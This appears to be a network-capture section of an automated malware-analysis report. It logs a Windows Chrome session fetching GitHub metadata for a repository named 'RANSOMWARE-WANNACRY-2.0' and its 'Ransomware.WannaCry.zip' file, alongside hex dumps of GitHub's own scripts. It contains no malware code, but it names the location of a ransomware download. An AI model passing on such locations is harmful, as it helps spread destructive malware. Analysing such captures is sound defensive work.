                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 6f 64 65 54 65 6d 70 6c 61 74 65 50 61 72 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 29 7b 74 68 69 73 2e 65 78 70 72 65 73 73 69 6f 6e 3d 74 2c 61 2e 73 65 74 28 74 68 69 73 2c 5b 65 5d 29 2c 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 22 22 7d 67 65 74 20 76 61 6c 75 65 28 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 28 74 68 69 73 29 2e 6d 61 70 28 65 3d 3e 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 29 2e 6a 6f 69 6e 28 22 22 29 7d 73 65 74 20 76 61 6c 75 65 28 65 29 7b 74 68 69 73 2e 72 65 70 6c 61 63 65 28 65 29 7d 67 65 74 20 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 28 74 68 69 73 29 5b 30 5d 2e 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 7d 67 65 74 20 6e 65 78 74 53 69 62 6c 69 6e 67 28 29 7b 72 65
                                                                                      Data Ascii: odeTemplatePart{constructor(e,t){this.expression=t,a.set(this,[e]),e.textContent=""}get value(){return a.get(this).map(e=>e.textContent).join("")}set value(e){this.replace(e)}get previousSibling(){return a.get(this)[0].previousSibling}get nextSibling(){re


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      84192.168.2.1649791140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC1109OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/refs?type=branch HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Accept: application/json
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:26 UTC513INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"8472f0ac1bd0bdea4efec9eccc6c7961"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:26 UTC2934INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:26 UTC48INData Raw: 7b 22 72 65 66 73 22 3a 5b 22 6d 61 73 74 65 72 22 5d 2c 22 63 61 63 68 65 4b 65 79 22 3a 22 76 30 3a 31 34 39 36 33 33 37 35 34 38 2e 30 22 7d
                                                                                      Data Ascii: {"refs":["master"],"cacheKey":"v0:1496337548.0"}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      85192.168.2.1649792140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC1232OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/latest-commit/master/Ransomware.WannaCry.zip HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: application/json
                                                                                      Accept: application/json
                                                                                      X-Requested-With: XMLHttpRequest
                                                                                      GitHub-Verified-Fetch: true
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:26 UTC513INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"97c18cc82e71efdd5cf716e73ab1e4b4"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:26 UTC2935INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:26 UTC662INData Raw: 7b 22 6f 69 64 22 3a 22 31 39 62 64 38 36 66 38 39 39 38 66 64 30 61 33 34 64 30 35 31 63 61 64 33 38 39 34 63 61 31 39 31 35 35 66 63 64 62 65 22 2c 22 75 72 6c 22 3a 22 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 63 6f 6d 6d 69 74 2f 31 39 62 64 38 36 66 38 39 39 38 66 64 30 61 33 34 64 30 35 31 63 61 64 33 38 39 34 63 61 31 39 31 35 35 66 63 64 62 65 22 2c 22 64 61 74 65 22 3a 22 32 30 31 37 2d 30 36 2d 30 31 54 31 34 3a 31 39 3a 34 35 2e 30 30 30 2d 30 33 3a 30 30 22 2c 22 73 68 6f 72 74 4d 65 73 73 61 67 65 48 74 6d 6c 4c 69 6e 6b 22 3a 22 3c 61 20 64 61 74 61 2d 70 6a 61 78 3d 5c 22 74 72 75 65 5c 22 20 63 6c 61 73 73 3d 5c 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 5c 22 20 68
                                                                                      Data Ascii: {"oid":"19bd86f8998fd0a34d051cad3894ca19155fcdbe","url":"/chronosmiki/RANSOMWARE-WANNACRY-2.0/commit/19bd86f8998fd0a34d051cad3894ca19155fcdbe","date":"2017-06-01T14:19:45.000-03:00","shortMessageHtmlLink":"<a data-pjax=\"true\" class=\"Link--secondary\" h
                                                                                      2024-03-23 14:47:26 UTC236INData Raw: 39 33 31 3f 76 3d 34 22 2c 22 70 61 74 68 22 3a 22 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 22 7d 5d 2c 22 63 6f 6d 6d 69 74 74 65 72 41 74 74 72 69 62 75 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 63 6f 6d 6d 69 74 74 65 72 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 77 65 62 2d 66 6c 6f 77 22 2c 22 64 69 73 70 6c 61 79 4e 61 6d 65 22 3a 22 47 69 74 48 75 62 22 2c 22 61 76 61 74 61 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 75 2f 31 39 38 36 34 34 34 37 3f 76 3d 34 22 2c 22 70 61 74 68 22 3a 22 2f 77 65 62 2d 66 6c 6f 77 22 7d 2c 22 73 74 61 74 75 73 22 3a 6e 75 6c 6c 2c 22 69 73 53 70 6f 6f 66 65 64 22 3a 66 61 6c 73 65 7d
                                                                                      Data Ascii: 931?v=4","path":"/chronosmiki"}],"committerAttribution":false,"committer":{"login":"web-flow","displayName":"GitHub","avatarUrl":"https://avatars.githubusercontent.com/u/19864447?v=4","path":"/web-flow"},"status":null,"isSpoofed":false}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      86192.168.2.1649790140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC1236OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/deferred-metadata/master/Ransomware.WannaCry.zip HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: application/json
                                                                                      Accept: application/json
                                                                                      X-Requested-With: XMLHttpRequest
                                                                                      GitHub-Verified-Fetch: true
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:26 UTC513INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"3ca1cb8ac06e96da0082e70bd7b7c408"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:26 UTC2937INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:26 UTC239INData Raw: 7b 22 73 68 6f 77 4c 69 63 65 6e 73 65 4d 65 74 61 22 3a 66 61 6c 73 65 2c 22 6c 69 63 65 6e 73 65 22 3a 6e 75 6c 6c 2c 22 6e 65 77 49 73 73 75 65 50 61 74 68 22 3a 22 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 69 73 73 75 65 73 2f 6e 65 77 22 2c 22 6e 65 77 44 69 73 63 75 73 73 69 6f 6e 50 61 74 68 22 3a 6e 75 6c 6c 2c 22 63 6f 64 65 6f 77 6e 65 72 49 6e 66 6f 22 3a 7b 22 63 6f 64 65 6f 77 6e 65 72 50 61 74 68 22 3a 6e 75 6c 6c 2c 22 6f 77 6e 65 64 42 79 43 75 72 72 65 6e 74 55 73 65 72 22 3a 6e 75 6c 6c 2c 22 6f 77 6e 65 72 73 46 6f 72 46 69 6c 65 22 3a 6e 75 6c 6c 2c 22 72 75 6c 65 46 6f 72 50 61 74 68 4c 69 6e 65 22 3a 6e 75 6c 6c 7d 7d
                                                                                      Data Ascii: {"showLicenseMeta":false,"license":null,"newIssuePath":"/chronosmiki/RANSOMWARE-WANNACRY-2.0/issues/new","newDiscussionPath":null,"codeownerInfo":{"codeownerPath":null,"ownedByCurrentUser":null,"ownersForFile":null,"ruleForPathLine":null}}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      87192.168.2.1649793185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC698OUTGET /assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-57f9943adb92.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 8189
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 22 Feb 2024 16:53:09 GMT
                                                                                      ETag: 0x8DC33C6BFC3BB17
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Age: 2062960
                                                                                      X-Served-By: cache-iad-kjyo7100116-IAD, cache-lga21979-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 401, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 7bc0c378b408d10b3beb16eed930c42dcadac69e
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 77 65 62 61 75 74 68 6e 2d 67 65 74 2d 65 6c 65 6d 65 6e 74 5f 77 65 62 61 75 74 68 6e 2d 67 65 74 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 5d 2c 7b 38 30 37 30 32 3a 28 74 2c 65 2c 6e 29 3d 3e 7b 6e 2e 64 28 65 2c 7b 42 74 3a 28 29 3d 3e 73 2c 44 4e 3a 28 29 3d 3e 61 2c 4b 4c 3a 28 29 3d 3e 63 2c 53 65 3a 28 29 3d 3e 6f 2c 71 43 3a 28 29 3d 3e 64 2c 73 77 3a 28 29 3d 3e 75 7d 29 3b 76 61 72 20 69 3d 6e 28 33 31 33 34 37 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20 74
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_webauthn-get-element_webauthn-get-element_ts"],{80702:(t,e,n)=>{n.d(e,{Bt:()=>s,DN:()=>a,KL:()=>c,Se:()=>o,qC:()=>d,sw:()=>u});var i=n(31347);function r(t,e,n){return t
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 26 26 22 73 75 62 6d 69 74 22 21 3d 3d 6e 26 26 22 72 65 73 65 74 22 21 3d 3d 6e 7c 7c 74 2e 69 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 74 2c 65 29 7b 6c 65 74 20 6e 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 74 2e 73 65 61 72 63 68 29 2c 69 3d 6c 28 65 29 3b 66 6f 72 28 6c 65 74 5b 74 2c 65 5d 6f 66 20 69 29 6e 2e 61 70 70 65 6e 64 28 74 2c 65 29 3b 72 65 74 75 72 6e 20 6e 2e 74 6f 53 74 72 69 6e 67 28 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 74 29 7b 72 65 74 75 72 6e 20 6c 28 6e 65 77 20 46 6f 72 6d 44 61 74 61 28 74 29 29 2e 74 6f 53 74 72 69 6e 67 28 29 7d 7d
                                                                                      Data Ascii: &&"submit"!==n&&"reset"!==n||t.isContentEditable}function l(t){return new URLSearchParams(t)}function c(t,e){let n=new URLSearchParams(t.search),i=l(e);for(let[t,e]of i)n.append(t,e);return n.toString()}function d(t){return l(new FormData(t)).toString()}}
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 61 73 79 6e 63 20 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 7b 74 68 69 73 2e 6f 72 69 67 69 6e 61 6c 42 75 74 74 6f 6e 54 65 78 74 3d 74 68 69 73 2e 67 65 74 43 75 72 72 65 6e 74 42 75 74 74 6f 6e 54 65 78 74 28 29 2c 74 68 69 73 2e 6f 72 69 67 69 6e 61 6c 45 72 72 6f 72 54 65 78 74 3d 74 68 69 73 2e 65 72 72 6f 72 54 65 78 74 2e 74 65 78 74 43 6f 6e 74 65 6e 74 2c 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 28 30 2c 6f 2e 5a 68 29 28 29 3f 22 72 65 61 64 79 22 3a 22 75 6e 73 75 70 70 6f 72 74 65 64 22 29 2c 74 68 69 73 2e 70 61 73 73 6b 65 79 53 75 70 70 6f 72 74 3d 61 77 61 69 74 20 77 69 6e 64 6f 77 2e 50 75 62 6c 69 63 4b 65 79 43 72 65 64 65 6e 74 69 61 6c 3f 2e 69 73 55 73 65 72 56 65 72 69 66 79 69 6e 67 50 6c 61 74 66 6f 72 6d 41 75
                                                                                      Data Ascii: async connectedCallback(){this.originalButtonText=this.getCurrentButtonText(),this.originalErrorText=this.errorText.textContent,this.setState((0,o.Zh)()?"ready":"unsupported"),this.passkeySupport=await window.PublicKeyCredential?.isUserVerifyingPlatformAu
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 2c 74 68 69 73 2e 6d 65 73 73 61 67 65 73 29 29 74 2e 68 69 64 64 65 6e 3d 21 30 3b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 69 6e 69 74 69 61 6c 69 7a 69 6e 67 22 3a 74 68 69 73 2e 62 75 74 74 6f 6e 2e 64 69 73 61 62 6c 65 64 3d 21 30 3b 62 72 65 61 6b 3b 63 61 73 65 22 75 6e 73 75 70 70 6f 72 74 65 64 22 3a 74 68 69 73 2e 62 75 74 74 6f 6e 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 74 68 69 73 2e 75 6e 73 75 70 70 6f 72 74 65 64 4d 65 73 73 61 67 65 2e 68 69 64 64 65 6e 3d 21 31 2c 74 68 69 73 2e 70 61 73 73 6b 65 79 73 55 6e 73 75 70 70 6f 72 74 65 64 4d 65 73 73 61 67 65 26 26 28 74 68 69 73 2e 70 61 73 73 6b 65 79 73 55 6e 73 75 70 70 6f 72 74 65 64 4d 65 73 73 61 67 65 2e 68 69 64 64 65 6e 3d 21 30 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 72 65 61
                                                                                      Data Ascii: ",this.messages))t.hidden=!0;switch(t){case"initializing":this.button.disabled=!0;break;case"unsupported":this.button.disabled=!0,this.unsupportedMessage.hidden=!1,this.passkeysUnsupportedMessage&&(this.passkeysUnsupportedMessage.hidden=!0);break;case"rea
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 4d 65 73 73 61 67 65 22 2c 76 6f 69 64 20 30 29 2c 75 28 5b 73 2e 66 41 5d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2c 22 77 61 69 74 69 6e 67 4d 65 73 73 61 67 65 22 2c 76 6f 69 64 20 30 29 2c 75 28 5b 73 2e 66 41 5d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2c 22 65 72 72 6f 72 4d 65 73 73 61 67 65 22 2c 76 6f 69 64 20 30 29 2c 75 28 5b 73 2e 66 41 5d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2c 22 65 72 72 6f 72 54 65 78 74 22 2c 76 6f 69 64 20 30 29 2c 75 28 5b 73 2e 4c 6a 5d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2c 22 64 61 74 61 4a 73 6f 6e 22 2c 76 6f 69 64 20 30 29 2c 75 28 5b 73 2e 4c 6a 5d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2c 22 73 75 62 74 6c 65 4c 6f 67 69 6e 22 2c 76 6f 69 64 20 30 29 2c 6c 3d 75 28 5b 73 2e 49 68 5d 2c 6c 29 7d 2c 38 34 33 33 3a 28 74 2c 65
                                                                                      Data Ascii: Message",void 0),u([s.fA],l.prototype,"waitingMessage",void 0),u([s.fA],l.prototype,"errorMessage",void 0),u([s.fA],l.prototype,"errorText",void 0),u([s.Lj],l.prototype,"dataJson",void 0),u([s.Lj],l.prototype,"subtleLogin",void 0),l=u([s.Ih],l)},8433:(t,e
